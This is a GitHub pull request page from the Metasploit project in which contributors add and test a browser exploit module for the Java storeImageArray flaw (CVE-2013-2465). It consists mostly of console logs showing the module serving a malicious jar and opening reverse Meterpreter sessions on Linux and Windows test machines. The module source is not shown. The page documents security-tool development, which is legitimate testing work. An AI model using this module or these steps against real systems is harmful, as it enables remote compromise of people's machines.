Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Port for OSVDB 96269 #2232

Merged
merged 4 commits into from Aug 16, 2013
Merged

Add Port for OSVDB 96269 #2232

merged 4 commits into from Aug 16, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Worked today with @wchen-r7 on porting it. Based entirely on the PacketStorm PoC

Atm working on Linux and Windows with J7u7 and j7u21 successfully:

msf > use exploit/multi/browser/java_storeimagearray 
msf exploit(java_storeimagearray) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/RmKI0fo
[*]  Local IP: http://192.168.0.3:8080/RmKI0fo
[*] Server started.
msf exploit(java_storeimagearray) > [!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo
[*] 192.168.0.3      java_storeimagearray - Sending redirect...
[!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo/
[*] 192.168.0.3      java_storeimagearray - Sending HTML...
[!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo/bvBsm.jar
[*] 192.168.0.3      java_storeimagearray - Sending .jar file...
[!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo/bvBsm.jar
[*] 192.168.0.3      java_storeimagearray - Sending .jar file...
[*] Sending stage (30355 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:58179) at 2013-08-15 18:36:20 -0500

msf exploit(java_storeimagearray) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 2.6.32-38-generic (i386)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] fe80::20c:29ff:fec1:fdbd - Meterpreter session 1 closed.  Reason: User exit
msf exploit(java_storeimagearray) > 
[!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo
[*] 192.168.0.3      java_storeimagearray - Sending redirect...
[!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo/
[*] 192.168.0.3      java_storeimagearray - Sending HTML...
[!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo/WisroAt.jar
[*] 192.168.0.3      java_storeimagearray - Sending .jar file...
[!] 192.168.0.3      java_storeimagearray - Requesting: /RmKI0fo/WisroAt.jar
[*] 192.168.0.3      java_storeimagearray - Sending .jar file...
[*] Sending stage (30355 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:58212) at 2013-08-15 18:37:10 -0500

msf exploit(java_storeimagearray) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.208 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(java_storeimagearray) > exit -y

Pull request ready for testing, would like to try to add more references before landing... but in the meanwhile, testing is welcome!

@jvazquez-r7
Copy link
Contributor Author

After changes tested against Linux J7:

[*] fe80::20c:29ff:fec1:fdbd - Meterpreter session 1 closed.  Reason: User exit
msf exploit(java_storeimagearray) > 
[!] 192.168.172.187  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv
[*] 192.168.172.187  java_storeimagearray - Sending redirect...
[!] 192.168.172.187  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv/
[*] 192.168.172.187  java_storeimagearray - Sending HTML...
[!] 192.168.172.187  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv/qXZBwtr.jar
[*] 192.168.172.187  java_storeimagearray - Sending .jar file...
[!] 192.168.172.187  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv/qXZBwtr.jar
[*] 192.168.172.187  java_storeimagearray - Sending .jar file...
[*] Sending stage (30355 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:59836) at 2013-08-15 22:56:18 -0500

msf exploit(java_storeimagearray) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
eComputer    : ubuntu
OS          : Linux 2.6.32-38-generic (i386)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

And Windows7 Java6 (both IE8, Chrome and FF 17):

msf exploit(java_storeimagearray) > 
[!] 192.168.172.172  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv
[*] 192.168.172.172  java_storeimagearray - Sending redirect...
[!] 192.168.172.172  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv/
[*] 192.168.172.172  java_storeimagearray - Sending HTML...
[!] 192.168.172.172  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv/LLSMs.jar
[*] 192.168.172.172  java_storeimagearray - Sending .jar file...
[!] 192.168.172.172  java_storeimagearray - Requesting: /FCHMxJFXCMeqfv/LLSMs.jar
[*] 192.168.172.172  java_storeimagearray - Sending .jar file...
[*] Sending stage (30355 bytes) to 192.168.0.3
[*] Meterpreter session 3 opened (192.168.0.3:4444 -> 192.168.0.3:59885) at 2013-08-15 22:59:49 -0500

msf exploit(java_storeimagearray) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: Juan Vazquez
meterpreter > sysinfo
Computer    : WIN-RNJ7NBRK9L7
OS          : Windows 7 6.1 (x86)
Meterpreter : java/java
meterpreter >

Hope the references are okey, based on the code comments, has sense with the CVE-2013-2465's patch

@wchen-r7
Copy link
Contributor

Yup, works fine here. Merging:

msf exploit(java_storeimagearray) > [!] 10.0.1.78        java_storeimagearray - Requesting: /lEpX42v9vqcgi
[*] 10.0.1.78        java_storeimagearray - Sending redirect...
[!] 10.0.1.78        java_storeimagearray - Requesting: /lEpX42v9vqcgi/
[*] 10.0.1.78        java_storeimagearray - Sending HTML...
[!] 10.0.1.78        java_storeimagearray - Requesting: /lEpX42v9vqcgi/WIJrrC.jar
[*] 10.0.1.78        java_storeimagearray - Sending .jar file...
[!] 10.0.1.78        java_storeimagearray - Requesting: /lEpX42v9vqcgi/WIJrrC.jar
[*] 10.0.1.78        java_storeimagearray - Sending .jar file...
[*] Sending stage (30355 bytes) to 10.0.1.78
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.78:2354) at 2013-08-16 01:14:31 -0500

wchen-r7 added a commit that referenced this pull request Aug 16, 2013
@wchen-r7
Land #2232 - CVE-2013-2465: Java storeImageArray() Invalid Array Inde…
3762b84 
…xing
@wchen-r7 wchen-r7 merged commit 1a3b4ee into rapid7:master Aug 16, 2013
@jvazquez-r7 jvazquez-r7 deleted the java_store_imagearray branch November 18, 2014 15:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@jvazquez-r7 @wchen-r7 @kernelsmith @booboule @void-in